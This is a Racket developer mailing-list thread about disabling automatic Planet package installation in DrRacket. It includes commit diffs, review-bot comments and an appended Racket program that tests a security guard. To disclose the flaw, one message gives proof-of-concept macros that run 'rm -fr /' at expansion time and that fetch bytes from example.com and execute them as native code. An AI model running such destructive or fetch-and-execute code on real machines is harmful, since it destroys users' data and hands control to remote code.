Re: [racket-dev] [plt] Push #27862: master branch updated
Am I naive or isn't any download of any package opening the door to such tricks?

On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote:

> On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler ro...@eecs.northwestern.edu wrote:
>> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy j...@racket-lang.org wrote:
>>> If I have background expansion on, then when I open that file it installs the package.
>>
>> As I wrote in my previous message, it doesn't do that for me. And I don't see how it could do that, actually. Are you saying that you tried this?
>
> Yes. I put that in a file and opened it up with DrRacket then got the Can't download a Planet package error message as-if the install were stopped.
>
>> Can you explain how you have configured DrRacket to disable the security guard that is installed by the background expansion process, please?
>
> Perhaps my trial was bad because the security guard would have stopped the network access but my error stopped the library from attempting the network access? Regardless, Check Syntax (I think?) or compilation in Racket would have installed it. [Now, obviously the same macro tricks could explicitly call download/install-pkg... but I think it is a bit feeble to say Check Syntax should make no attempt to prevent package installation.]
>
>> Meanwhile, I would like to point out that your commit has completely disabled planet. No packages can be installed. Did you run any test suites after making this change?
>
> I tried to install and fetch some packages. I see now that I committed in the racket/collects directory but the changes to make that work were in the pkgs/planet-pkgs directory so I stupidly missed them.
>
> Jay
>
>> Robby

_ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
In short yes. But that short answer isn't where we should stop. :)

Really, this is about a design decision that's different between planet and the package system: in planet, running a program was sufficient for installing packages. In the package system you have to take an explicit step to install the package. I used quotes there because the devil is a bit in the details here (as Jay points out with his some macro tricks comment) but really what we're talking about is that design difference and UX issues.

Overall, I feel like the package system's different design decisions are the right way to go but that we should keep planet being planet (and Jay and I had a discussion about that offline), which is why he reverted one of those commits.

And to clear up the check syntax thing: there is no way that online check syntax could have installed a planet package (or, for that matter, made any changes to your file system). You would have had to Run the program or explicitly ask for it to be compiled or something like that.

Make more sense?

Robby

On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen matth...@ccs.neu.edu wrote:
> Am I naive or isn't any download of any package opening the door to such tricks?
>
> On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote:
>> On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler ro...@eecs.northwestern.edu wrote:
>>> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy j...@racket-lang.org wrote:
>>>> If I have background expansion on, then when I open that file it installs the package.
>>>
>>> As I wrote in my previous message, it doesn't do that for me. And I don't see how it could do that, actually. Are you saying that you tried this?
>>
>> Yes. I put that in a file and opened it up with DrRacket then got the Can't download a Planet package error message as-if the install were stopped.
>>
>>> Can you explain how you have configured DrRacket to disable the security guard that is installed by the background expansion process, please?
Re: [racket-dev] [plt] Push #27862: master branch updated
And similarly, the package system is a social curation system to monitor packages for good behavior, which planet does do (but could have and could now.)

Jay

On Thu, Nov 28, 2013 at 7:56 AM, Robby Findler ro...@eecs.northwestern.edu wrote:
> In short yes. But that short answer isn't where we should stop. :)
>
> Really, this is about a design decision that's different between planet and the package system: in planet, running a program was sufficient for installing packages. In the package system you have to take an explicit step to install the package. I used quotes there because the devil is a bit in the details here (as Jay points out with his some macro tricks comment) but really what we're talking about is that design difference and UX issues.
>
> Overall, I feel like the package system's different design decisions are the right way to go but that we should keep planet being planet (and Jay and I had a discussion about that offline), which is why he reverted one of those commits.
>
> And to clear up the check syntax thing: there is no way that online check syntax could have installed a planet package (or, for that matter, made any changes to your file system). You would have had to Run the program or explicitly ask for it to be compiled or something like that.
>
> Make more sense?
>
> Robby
>
> On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen matth...@ccs.neu.edu wrote:
>> Am I naive or isn't any download of any package opening the door to such tricks?
>>
>> On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote:
>>> On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler ro...@eecs.northwestern.edu wrote:
>>>> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy j...@racket-lang.org wrote:
>>>>> If I have background expansion on, then when I open that file it installs the package.
>>>>
>>>> As I wrote in my previous message, it doesn't do that for me. And I don't see how it could do that, actually. Are you saying that you tried this?
>>>
>>> Yes.
Re: [racket-dev] [plt] Push #27862: master branch updated
Oh, yes. I meant to add this to my message. This is a big part of why I think the package system is going to work well: there is now some movement in this good direction. (Jacob and Matthias and I had talked about social stuff in the context of planet a bunch, but a) didn't do enough and b) had a slightly different emphasis -- but b) probably would have changed if we'd dug into it.)

Robby

On Thu, Nov 28, 2013 at 8:57 AM, Jay McCarthy j...@racket-lang.org wrote:
> And similarly, the package system is a social curation system to monitor packages for good behavior, which planet does do (but could have and could now.)
>
> Jay
>
> On Thu, Nov 28, 2013 at 7:56 AM, Robby Findler ro...@eecs.northwestern.edu wrote:
>> In short yes. But that short answer isn't where we should stop. :)
>>
>> Really, this is about a design decision that's different between planet and the package system: in planet, running a program was sufficient for installing packages. In the package system you have to take an explicit step to install the package. I used quotes there because the devil is a bit in the details here (as Jay points out with his some macro tricks comment) but really what we're talking about is that design difference and UX issues.
>>
>> Overall, I feel like the package system's different design decisions are the right way to go but that we should keep planet being planet (and Jay and I had a discussion about that offline), which is why he reverted one of those commits.
>>
>> And to clear up the check syntax thing: there is no way that online check syntax could have installed a planet package (or, for that matter, made any changes to your file system). You would have had to Run the program or explicitly ask for it to be compiled or something like that.
>>
>> Make more sense?
>>
>> Robby
>>
>> On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen matth...@ccs.neu.edu wrote:
>>> Am I naive or isn't any download of any package opening the door to such tricks?
Re: [racket-dev] [plt] Push #27862: master branch updated
There is an important change in this commit.

Since we've created the release branch for 6.0, I think we should stop automatically installing and executing arbitrary code when people open files in DrRacket.

Currently the error message suggests using raco planet but I think we need a bit of a GUI shim for other users.

On Wed, Nov 27, 2013 at 3:40 PM, j...@racket-lang.org wrote:
> jay has updated `master' from 033065f632 to 60ae164d05. http://git.racket-lang.org/plt/033065f632..60ae164d05 =[ 6 Commits ]== Directory summary: 57.6% pkgs/plt-services/meta/pkg-index/official/static/ 17.6% pkgs/plt-services/meta/pkg-index/official/ 22.0% racket/collects/planet/private/ ~~ 2413278 Jay McCarthy j...@racket-lang.org 2013-11-27 14:51 : | moving delete button : M .../meta/pkg-index/official/static/index.html | 2 ++ M .../meta/pkg-index/official/static/index.js | 16 +--- M .../meta/pkg-index/official/static/style.css | 4 ~~ 113696c Jay McCarthy j...@racket-lang.org 2013-11-27 14:54 : | edit on lose focus : M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++- ~~ cf1755f Jay McCarthy j...@racket-lang.org 2013-11-27 15:19 : | Remove arbitrary code execution exploit from Racket and DrRacket | | This is particularly bad with DrRacket's online syntax checking, which | causes opening a file to download and executed aribtrary code.
: M racket/collects/planet/private/resolver.rkt | 8 ~~ 98df30c Jay McCarthy j...@racket-lang.org 2013-11-27 15:30 : | deleting static s3 content properly : M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 ++- ~~ 7b7a5ad Jay McCarthy j...@racket-lang.org 2013-11-27 15:33 : | increase pkg test timeout : M pkgs/plt-services/meta/props | 2 +- ~~ 60ae164 Jay McCarthy j...@racket-lang.org 2013-11-27 15:39 : | Removing add tag button when not logged in re mflatt : M pkgs/plt-services/meta/pkg-index/official/static/index.js | 11 +-- M .../plt-services/meta/pkg-index/official/static/index.html | 2 +- =[ Overall Diff ]=== pkgs/plt-services/meta/pkg-index/official/static.rkt --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt @@ -304,7 +304,16 @@ (cache /pkgs pkgs) (cache /pkgs-all pkgs-all) (for ([p (in-list pkg-list)]) -(cache (format /pkg/~a p) (format pkg/~a p +(cache (format /pkg/~a p) (format pkg/~a p))) + + (let () +(define pkg-path (build-path static-path pkg)) +(for ([f (in-list (directory-list pkg-path))] + #:unless (regexp-match #json$ (path-string f)) + #:unless (member (path-string f) pkg-list)) + (with-handlers ([exn:fail:filesystem? void]) +(delete-file (build-path pkg-path f)) +(delete-file (build-path pkg-path (path-add-suffix f #.json))) (module+ main (require racket/cmdline) pkgs/plt-services/meta/pkg-index/official/static/index.html ~~~ --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.html +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.html 
@@ -54,12 +54,14 @@ trtdLast Edit:/tdtdspan id=pi_last_edit/span/td/tr trtdDescription:/tdtdspan id=pi_description/span/td/tr trtdTags:/tdtdspan id=pi_tags/span/td/tr -trtd/tdtdinput type=text id=pi_add_tag_text class=text ui-widget-content ui-corner-all /button id=pi_add_tag_buttonAdd Tag/button/td/tr +tr id=pi_add_tag_rowtd/tdtdinput type=text id=pi_add_tag_text class=text ui-widget-content ui-corner-all /button id=pi_add_tag_buttonAdd Tag/button/td/tr tr id=pi_versions_rowtdVersions Exceptions/tdtdtable id=pi_versions/table/td/tr tr id=pi_add_version_rowtd/tdtdlabelVersion:/label input type=text id=pi_add_version_text class=text ui-widget-content ui-corner-all /br /labelSource:/label input type=text id=pi_add_version_source_text class=text ui-widget-content ui-corner-all /button id=pi_add_version_buttonAdd Version Exception/button/td/tr tr id=pi_dependencies_rowtdDependencies/tdtdspan id=pi_dependencies/span/td/tr tr id=pi_conflicts_rowtdConflicts/tdtdspan id=pi_conflicts/span/td/tr trtdModules/tdtdspan id=pi_modules/span/td/tr +tr id=pi_delete_rowtd colspan=2button id=pi_delete_buttonDelete +Package/buttonbr /(there is no undo!)/td/tr /table div id=pi_install class=installInstall this package with:brbrttraco pkg install span id=pi_name_inst/span/ttbrbror, with the 'File|Install Package...' menu option in DrRacket./div
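Review bot: In the cleanup loop added to static.rkt, both delete-file calls share one with-handlers whose handler is void, so a failure of the first delete skips the second, and a failure of the second is silently discarded after the first has already succeeded. In that second case the orphaned .json file is never revisited, because later runs skip every name matching json$. Guard each delete separately and log the exception rather than dropping it. The json$ filter as shown also has no leading dot, so any entry whose name merely ends in "json" is exempt from cleanup; matching on the extension would be tighter.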
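Review bot: The new pi_delete_row near the end of the table in index.html is part of the static markup served to every visitor, and nothing visible in this hunk restricts it to the package owner, whereas the add-tag row gains an id (pi_add_tag_row) in the same push, apparently for the "Removing add tag button when not logged in" commit. Please confirm that index.js hides pi_delete_row for users who may not delete the package and that the server rejects unauthorized delete requests regardless of what the page shows. Since the label says "(there is no undo!)", a confirmation step before the request is sent would also be worth adding.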
Re: [racket-dev] [plt] Push #27862: master branch updated
Can you demonstrate how to make this happen? Opening a file with these contents, for example, doesn't install anything.

  #lang racket
  (require (planet planet/test-connection:1:0/test-connection))

As for automatically executing arbitrary code, I think you must mean something more precise here. Perhaps code that hasn't already been explicitly installed? If that's what you mean, then I think I'm also missing how this happens.

Robby

On Wed, Nov 27, 2013 at 4:42 PM, Jay McCarthy j...@racket-lang.org wrote:
> There is an important change in this commit.
>
> Since we've created the release branch for 6.0, I think we should stop automatically installing and executing arbitrary code when people open files in DrRacket.
>
> Currently the error message suggests using raco planet but I think we need a bit of a GUI shim for other users.
>
> On Wed, Nov 27, 2013 at 3:40 PM, j...@racket-lang.org wrote:
>> jay has updated `master' from 033065f632 to 60ae164d05. http://git.racket-lang.org/plt/033065f632..60ae164d05 =[ 6 Commits ]== Directory summary: 57.6% pkgs/plt-services/meta/pkg-index/official/static/ 17.6% pkgs/plt-services/meta/pkg-index/official/ 22.0% racket/collects/planet/private/ ~~ 2413278 Jay McCarthy j...@racket-lang.org 2013-11-27 14:51 : | moving delete button : M .../meta/pkg-index/official/static/index.html | 2 ++ M .../meta/pkg-index/official/static/index.js | 16 +--- M .../meta/pkg-index/official/static/style.css | 4 ~~ 113696c Jay McCarthy j...@racket-lang.org 2013-11-27 14:54 : | edit on lose focus : M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++- ~~ cf1755f Jay McCarthy j...@racket-lang.org 2013-11-27 15:19 : | Remove arbitrary code execution exploit from Racket and DrRacket | | This is particularly bad with DrRacket's online syntax checking, which | causes opening a file to download and executed aribtrary code.
: M racket/collects/planet/private/resolver.rkt | 8 ~~ 98df30c Jay McCarthy j...@racket-lang.org 2013-11-27 15:30 : | deleting static s3 content properly : M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 ++- ~~ 7b7a5ad Jay McCarthy j...@racket-lang.org 2013-11-27 15:33 : | increase pkg test timeout : M pkgs/plt-services/meta/props | 2 +- ~~ 60ae164 Jay McCarthy j...@racket-lang.org 2013-11-27 15:39 : | Removing add tag button when not logged in re mflatt : M pkgs/plt-services/meta/pkg-index/official/static/index.js | 11 +-- M .../plt-services/meta/pkg-index/official/static/index.html | 2 +- =[ Overall Diff ]=== pkgs/plt-services/meta/pkg-index/official/static.rkt --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt @@ -304,7 +304,16 @@ (cache /pkgs pkgs) (cache /pkgs-all pkgs-all) (for ([p (in-list pkg-list)]) -(cache (format /pkg/~a p) (format pkg/~a p +(cache (format /pkg/~a p) (format pkg/~a p))) + + (let () +(define pkg-path (build-path static-path pkg)) +(for ([f (in-list (directory-list pkg-path))] + #:unless (regexp-match #json$ (path-string f)) + #:unless (member (path-string f) pkg-list)) + (with-handlers ([exn:fail:filesystem? void]) +(delete-file (build-path pkg-path f)) +(delete-file (build-path pkg-path (path-add-suffix f #.json))) (module+ main (require racket/cmdline) pkgs/plt-services/meta/pkg-index/official/static/index.html ~~~ --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.html +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.html 
@@ -54,12 +54,14 @@ trtdLast Edit:/tdtdspan id=pi_last_edit/span/td/tr trtdDescription:/tdtdspan id=pi_description/span/td/tr trtdTags:/tdtdspan id=pi_tags/span/td/tr -trtd/tdtdinput type=text id=pi_add_tag_text class=text ui-widget-content ui-corner-all /button id=pi_add_tag_buttonAdd Tag/button/td/tr +tr id=pi_add_tag_rowtd/tdtdinput type=text id=pi_add_tag_text class=text ui-widget-content ui-corner-all /button id=pi_add_tag_buttonAdd Tag/button/td/tr tr id=pi_versions_rowtdVersions Exceptions/tdtdtable id=pi_versions/table/td/tr tr id=pi_add_version_rowtd/tdtdlabelVersion:/label input type=text id=pi_add_version_text class=text ui-widget-content ui-corner-all /br /labelSource:/label input type=text id=pi_add_version_source_text class=text ui-widget-content ui-corner-all /button id=pi_add_version_buttonAdd Version
Re: [racket-dev] [plt] Push #27862: master branch updated
If I have background expansion on, then when I open that file it installs the package.

Since once a Planet package is installed it is set up and compiled that means that this code:

  #lang racket
  (attack)
  (define-syntax (attack stx)
    (system "rm -fr /"))

is automatically run as soon as I open it up.

Furthermore, I could do something like this:

  #lang racket
  (attack)
  (define-syntax (attack stx)
    (local-require (only-in '#%foreign ffi-call _int32)
                   net/http-client)
    (define-values (s hs ip) (http-sendrecv "example.com" "/"))
    (define bs (port->bytes ip))
    (printf "got: ~v\n" bs)
    (define weird-c-code bs)
    ((ffi-call weird-c-code null _int32)))

and really execute any C code that I could find on the Internet.

This isn't just a DrRacket problem though. We should not be arbitrarily installing things on people's machines without their consent. This power is too much. The new system of suggesting an install or allowing an opt-in for certain vetted packages is much kinder.

Jay

On Wed, Nov 27, 2013 at 5:35 PM, Robby Findler ro...@eecs.northwestern.edu wrote:
> Can you demonstrate how to make this happen? Opening a file with these contents, for example, doesn't install anything.
>
>   #lang racket
>   (require (planet planet/test-connection:1:0/test-connection))
>
> As for automatically executing arbitrary code, I think you must mean something more precise here. Perhaps code that hasn't already been explicitly installed? If that's what you mean, then I think I'm also missing how this happens.
>
> Robby
>
> On Wed, Nov 27, 2013 at 4:42 PM, Jay McCarthy j...@racket-lang.org wrote:
>> There is an important change in this commit.
>>
>> Since we've created the release branch for 6.0, I think we should stop automatically installing and executing arbitrary code when people open files in DrRacket.
>>
>> Currently the error message suggests using raco planet but I think we need a bit of a GUI shim for other users.
>>
>> On Wed, Nov 27, 2013 at 3:40 PM, j...@racket-lang.org wrote:
>>> jay has updated `master' from 033065f632 to 60ae164d05.
http://git.racket-lang.org/plt/033065f632..60ae164d05 =[ 6 Commits ]== Directory summary: 57.6% pkgs/plt-services/meta/pkg-index/official/static/ 17.6% pkgs/plt-services/meta/pkg-index/official/ 22.0% racket/collects/planet/private/ ~~ 2413278 Jay McCarthy j...@racket-lang.org 2013-11-27 14:51 : | moving delete button : M .../meta/pkg-index/official/static/index.html | 2 ++ M .../meta/pkg-index/official/static/index.js | 16 +--- M .../meta/pkg-index/official/static/style.css | 4 ~~ 113696c Jay McCarthy j...@racket-lang.org 2013-11-27 14:54 : | edit on lose focus : M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++- ~~ cf1755f Jay McCarthy j...@racket-lang.org 2013-11-27 15:19 : | Remove arbitrary code execution exploit from Racket and DrRacket | | This is particularly bad with DrRacket's online syntax checking, which | causes opening a file to download and executed aribtrary code. : M racket/collects/planet/private/resolver.rkt | 8 ~~ 98df30c Jay McCarthy j...@racket-lang.org 2013-11-27 15:30 : | deleting static s3 content properly : M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 ++- ~~ 7b7a5ad Jay McCarthy j...@racket-lang.org 2013-11-27 15:33 : | increase pkg test timeout : M pkgs/plt-services/meta/props | 2 +- ~~ 60ae164 Jay McCarthy j...@racket-lang.org 2013-11-27 15:39 : | Removing add tag button when not logged in re mflatt : M pkgs/plt-services/meta/pkg-index/official/static/index.js | 11 +-- M .../plt-services/meta/pkg-index/official/static/index.html | 2 +- =[ Overall Diff ]=== pkgs/plt-services/meta/pkg-index/official/static.rkt --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt 
@@ -304,7 +304,16 @@ (cache /pkgs pkgs) (cache /pkgs-all pkgs-all) (for ([p (in-list pkg-list)]) -(cache (format /pkg/~a p) (format pkg/~a p +(cache (format /pkg/~a p) (format pkg/~a p))) + + (let () +(define pkg-path (build-path static-path pkg)) +(for ([f (in-list (directory-list pkg-path))] + #:unless (regexp-match #json$ (path-string f)) + #:unless (member (path-string f) pkg-list)) + (with-handlers ([exn:fail:filesystem? void]) +(delete-file (build-path pkg-path f)) +(delete-file (build-path pkg-path (path-add-suffix f #.json))) (module+ main (require racket/cmdline) pkgs/plt-services/meta/pkg-index/official/static/index.html
Re: [racket-dev] [plt] Push #27862: master branch updated
On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy j...@racket-lang.org wrote:
> If I have background expansion on, then when I open that file it installs the package.

As I wrote in my previous message, it doesn't do that for me. And I don't see how it could do that, actually. Are you saying that you tried this?

Can you explain how you have configured DrRacket to disable the security guard that is installed by the background expansion process, please?

Meanwhile, I would like to point out that your commit has completely disabled planet. No packages can be installed. Did you run any test suites after making this change?

Robby
Re: [racket-dev] [plt] Push #27862: master branch updated
On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler ro...@eecs.northwestern.edu wrote:
> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy j...@racket-lang.org wrote:
>> If I have background expansion on, then when I open that file it installs the package.
>
> As I wrote in my previous message, it doesn't do that for me. And I don't see how it could do that, actually. Are you saying that you tried this?

Yes. I put that in a file and opened it up with DrRacket then got the Can't download a Planet package error message as-if the install were stopped.

> Can you explain how you have configured DrRacket to disable the security guard that is installed by the background expansion process, please?

Perhaps my trial was bad because the security guard would have stopped the network access but my error stopped the library from attempting the network access? Regardless, Check Syntax (I think?) or compilation in Racket would have installed it. [Now, obviously the same macro tricks could explicitly call download/install-pkg... but I think it is a bit feeble to say Check Syntax should make no attempt to prevent package installation.]

> Meanwhile, I would like to point out that your commit has completely disabled planet. No packages can be installed. Did you run any test suites after making this change?

I tried to install and fetch some packages. I see now that I committed in the racket/collects directory but the changes to make that work were in the pkgs/planet-pkgs directory so I stupidly missed them.

Jay

> Robby
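The disagreement in this thread turns on whether a security guard is active while a file is being expanded. As an added illustration (not DrRacket's code and not written by anyone in the thread; `make-read-only-guard`, `expand-form` and both probe modules are constructed for this example), the following expands a module whose macro has an expansion-time side effect, first without a guard and then under a guard built with `make-security-guard` that refuses writes and network access:

```racket
#lang racket/base
;; Added example, not DrRacket's implementation. All names are illustrative.
(require racket/file)

;; A guard that permits reads but rejects writes, deletes, execution and
;; every network operation. Checks are also passed on to the parent guard.
(define (make-read-only-guard)
  (make-security-guard
   (current-security-guard)
   (lambda (who path modes)
     (when (for/or ([m (in-list '(write delete execute))]) (memq m modes))
       (error who "blocked ~a access to ~a" modes path)))
   (lambda (who host port mode)
     (error who "blocked network ~a to ~a:~a" mode host port))))

;; Expand FORM in a fresh namespace. Returns 'expanded on success or the
;; message of the exception that stopped expansion.
(define (expand-form form #:guarded? guarded?)
  (define ns (make-base-namespace))
  ;; Load racket/tcp before the guard is installed, so that the guard only
  ;; ever sees the side effects attempted by the macro itself.
  (parameterize ([current-namespace ns])
    (dynamic-require 'racket/tcp #f))
  (parameterize ([current-namespace ns]
                 [current-security-guard
                  (if guarded?
                      (make-read-only-guard)
                      (current-security-guard))])
    (with-handlers ([exn:fail? exn-message])
      (expand form)
      'expanded)))

;; Constructed sample input: a scratch file and two modules whose macros
;; act at expansion time. Nothing in them is ever run at phase 0.
(define marker (make-temporary-file "expansion-probe-~a.txt"))

(define file-probe
  `(module file-probe racket/base
     (require (for-syntax racket/base))
     (define-syntax (probe stx)
       ;; Side effect performed by the transformer, i.e. during expansion.
       (with-output-to-file ,(path->string marker) #:exists 'append
         (lambda () (write 'ran-at-expansion-time)))
       #''done)
     (probe)))

(define net-probe
  '(module net-probe racket/base
     (require (for-syntax racket/base racket/tcp))
     (define-syntax (probe stx)
       ;; The guard is consulted before any connection is attempted.
       (tcp-connect "localhost" 9)
       #''done)
     (probe)))

(define (report label result)
  (printf "~a: ~a\n" label result))

;; Without a guard, merely expanding the module writes to the scratch file.
(report "unguarded file probe" (expand-form file-probe #:guarded? #f))
(report "scratch file size after unguarded expansion" (file-size marker))
;; With the guard, the same expansions stop at the first write or connect.
(report "guarded file probe" (expand-form file-probe #:guarded? #t))
(report "guarded network probe" (expand-form net-probe #:guarded? #t))
(delete-file marker)
```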